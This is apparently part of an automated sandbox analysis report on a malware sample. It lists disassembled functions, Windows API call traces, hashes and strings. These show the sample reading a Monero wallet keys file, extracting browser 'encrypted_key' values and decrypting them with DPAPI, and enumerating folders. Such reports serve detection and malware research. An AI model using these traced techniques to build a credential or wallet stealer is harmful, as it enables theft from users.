                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 3b81270923d76abf63ab3fbf89ffa8338b909adbcfaad8e6175354b61c24d99c
                                • Instruction ID: 45f8ac930968496ce7a1746254836c21a437def7d9409ba49dd1e5458950e2d8
                                • Opcode Fuzzy Hash: 3b81270923d76abf63ab3fbf89ffa8338b909adbcfaad8e6175354b61c24d99c
                                • Instruction Fuzzy Hash: 408151768101089ACB08FBA0DD96EEE7378EF54300F44513AF417B2291EF746B4ADB62
                                Function 00ECF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00EE1580,00EE0D92), ref: 00ECF54C
                                • lstrlen.KERNEL32(00000000), ref: 00ECF56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: a797e3e3f278d507f75977f49c6cb9a52d07c1a9fd7a5807732e638ad4b17850
                                • Instruction ID: 97afd8ec6b1fd8a934fca77b287fdb62ead127e5b8de0fea638f3b59a9be8880
                                • Opcode Fuzzy Hash: a797e3e3f278d507f75977f49c6cb9a52d07c1a9fd7a5807732e638ad4b17850
                                • Instruction Fuzzy Hash: 95512376D001489ADB08FBA4DC96DED73B8EF54300F44953AF81677291EE34670ACBA2
                                Function 00ED70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 3722407311-3520659465
                                • Opcode ID: ec0047636a6c2d88c6da4ae463c6a20a61ad42c025cade08de0ee82a2d50f2b0
                                • Instruction ID: 01bf683ec5473fe4b8b965b81cd58d8f7b0c52105203ee103c2df5665d163628
                                • Opcode Fuzzy Hash: ec0047636a6c2d88c6da4ae463c6a20a61ad42c025cade08de0ee82a2d50f2b0
                                • Instruction Fuzzy Hash: A8518FB0D042189BDB24EB90DD86BEEB3B4EF44304F1461AAE55576281EB742F8ACF54
                                Function 00ED3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: a867ce30521605b9ef954b3da6c786a56e3ed380d3195f3d70868f8ad1435529
                                • Instruction ID: df85a4c0d6135e13eb02b3ec62cc819eca79860ad73eec40c24911913339505e
                                • Opcode Fuzzy Hash: a867ce30521605b9ef954b3da6c786a56e3ed380d3195f3d70868f8ad1435529
                                • Instruction Fuzzy Hash: AB414F75D10209AFCB04EFA5D845AEEB7B4EF44304F04902AE41677390DB75AB46CFA2
                                Function 00EC9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EC9D39
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                  • Part of subcall function 00EC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                  • Part of subcall function 00EC9AC0: LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                  • Part of subcall function 00EC9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EC9B84
                                  • Part of subcall function 00EC9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EC9BA3
                                  • Part of subcall function 00EC9B60: LocalFree.KERNEL32(?), ref: 00EC9BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 5e2328794461d9ab846a471d73f41ae632c73efdc3d051fa8859aa5cfcbd4043
                                • Instruction ID: 659ff7dfa8ec0df26517fab28c8f35cd013c92cdda0850365e534295fc28fd14
                                • Opcode Fuzzy Hash: 5e2328794461d9ab846a471d73f41ae632c73efdc3d051fa8859aa5cfcbd4043
                                • Instruction Fuzzy Hash: 613150B6D10209ABCB04DBE4DD89FEEB7B8AF48304F14551DE902B7242E7319A05CBA1
                                Function 00EDC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00EDC74E
                                  • Part of subcall function 00EDBF9F: __amsg_exit.LIBCMT ref: 00EDBFAF
                                • __getptd.LIBCMT ref: 00EDC765
                                • __amsg_exit.LIBCMT ref: 00EDC773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00EDC797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 56de016301ca9677f038b97fa7ea0548783fe265edf95e4b9c4e951dd0888db0
                                • Instruction ID: c1378bcf0ee1c27e4fb36f779a32a548cf433f0aace2bcc17b87d3f3312c1b0c
                                • Opcode Fuzzy Hash: 56de016301ca9677f038b97fa7ea0548783fe265edf95e4b9c4e951dd0888db0
                                • Instruction Fuzzy Hash: 9FF0F032A00306DBDB20BBB8884274E33E0EF00764F35214BF014BA3D2EB245943CE46
                                Function 00ED4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4F7A
                                • lstrcat.KERNEL32(?,00EE1070), ref: 00ED4F97
                                • lstrcat.KERNEL32(?,00DA9148), ref: 00ED4FAB
                                • lstrcat.KERNEL32(?,00EE1074), ref: 00ED4FBD
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED492C
                                  • Part of subcall function 00ED4910: FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                  • Part of subcall function 00ED4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                  • Part of subcall function 00ED4910: FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: d24e9aad3adb657adce81a7ee1766aa3689c6754f4a9175497075c857b4ae367
                                • Instruction ID: dcc3ed6400791c93ddd1efa1bad57188a0f5785c03382146193312756c73b575
                                • Opcode Fuzzy Hash: d24e9aad3adb657adce81a7ee1766aa3689c6754f4a9175497075c857b4ae367
                                • Instruction Fuzzy Hash: 6021B8B6D0030867C768F760EC46EED337CAB54300F0055A9B659A3185EEB597C98B91